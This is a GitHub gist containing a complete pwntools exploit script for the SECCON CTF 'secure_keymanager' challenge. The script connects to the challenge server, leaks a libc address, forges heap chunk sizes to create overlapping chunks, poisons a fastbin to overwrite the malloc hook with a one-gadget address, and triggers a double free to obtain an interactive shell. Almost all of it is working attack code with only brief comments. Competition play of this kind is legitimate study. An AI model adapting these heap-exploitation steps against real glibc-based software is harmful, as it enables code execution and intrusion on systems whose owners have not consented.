Created
December 11, 2017 08:21
-
-
Save romanking98/9c1b4dc01b81021082fe189fdc082d38 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from pwn import * | |
| p = remote("secure_keymanager.pwn.seccon.jp",47225) | |
| #p = process("./secure_keymanager",env={"LD_PRELOAD" : "./libc-2.23.so"}) | |
| raw_input() | |
| def menu(): | |
| p.recvuntil(">>") | |
| def add_key(length,title,key): | |
| menu() | |
| p.sendline("1") | |
| p.recvuntil("key length...") | |
| p.sendline(str(length)) | |
| p.recvuntil("title...") | |
| p.send(title) | |
| #p.recvuntil("key...") | |
| p.send(key) | |
| def show(): | |
| menu() | |
| p.sendline("2") | |
| # DO AS PER YOUR LIKING | |
| def edit_key(idx,new): | |
| menu() | |
| p.sendline("3") | |
| menu() | |
| name = "A"*8 | |
| name += p64(0x21) # 32 byte buffer | |
| p.sendline(name) | |
| password = "B"*6 + "\x00" | |
| menu() | |
| p.sendline(password) | |
| p.recvuntil("...") | |
| p.sendline(str(idx)) | |
| p.recvuntil("...") | |
| p.sendline(new) | |
| def remove_key(idx): | |
| menu() | |
| p.sendline("4") | |
| menu() | |
| name = "A"*8 | |
| name += p64(0x21) # 32 byte buffer | |
| p.sendline(name) | |
| password = "B"*6 + "\x00" | |
| menu() | |
| p.sendline(password) | |
| p.recvuntil("...") | |
| p.sendline(str(idx)) | |
| def leak(name): | |
| p.sendlineafter('>> ', '9') | |
| p.sendafter('>> ', name) | |
| p.recvuntil(name) | |
| return u64(p.recv(6).ljust(8, '\x00')) | |
| name = "A"*8 | |
| name += p64(0x21) # 32 byte buffer | |
| password = "B"*6 + "\x00" # 16 byte buffer | |
| p.recvuntil("Account Name >>") | |
| p.send(name) | |
| p.recvuntil("Master Pass >>") | |
| p.sendline(password) | |
| libc = leak('A'*0x18) - 0x3c5620 | |
| log.success("Libc: " + hex(libc)) | |
| ################################# | |
| buf1 = "X"*24 | |
| buf1 += "\xd1" | |
| buf2 = "Y"*16 | |
| buf2 += p64(0xd0) | |
| buf2 += "\x60\x01" | |
| add_key(-10,"\n","") | |
| add_key(130,"CCCCC\n","DDDDDDDD\n") | |
| add_key(-10,"\n","") | |
| add_key(130,"CCCCCCCC\n","DDDDDDDD\n") | |
| wild = "C"*24 | |
| wild += "\x90" # Set to point to wilderness chunk. | |
| add_key(130,wild,"DDDDDDDD\n") | |
| remove_key(1) | |
| remove_key(2) | |
| remove_key(0) | |
| add_key(-10,buf1,"") | |
| add_key(-10,buf2,"") | |
| remove_key(3) | |
| # Overlapped with fastbin. | |
| add_key(100,"CC\n","DDDD\n") | |
| payload = "F"*24 | |
| payload += "\x71" | |
| add_key(94,payload,"\n") | |
| add_key(50,"\n","\n") | |
| add_key(2,"\n","\n") # Try to align top chunk with an already malloc'ed chunk and then get 2 ptrs to point there. | |
| # Used later to trigger double free. | |
| spirit = p64(libc + 0x3c4aed) | |
| spirit += "\n" | |
| remove_key(1) | |
| edit_key(3,spirit) | |
| raw_input() | |
| magic = libc + 0xf0274 | |
| add_key(70,"aaaa\n","\n") | |
| finale = "R"*19 | |
| finale += p64(magic) + "\n" | |
| add_key(70,finale,"\n") | |
| # Now we have 2 ptrs pointing to same chunk. So, can trigger double free. | |
| remove_key(4) | |
| remove_key(6) | |
| p.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment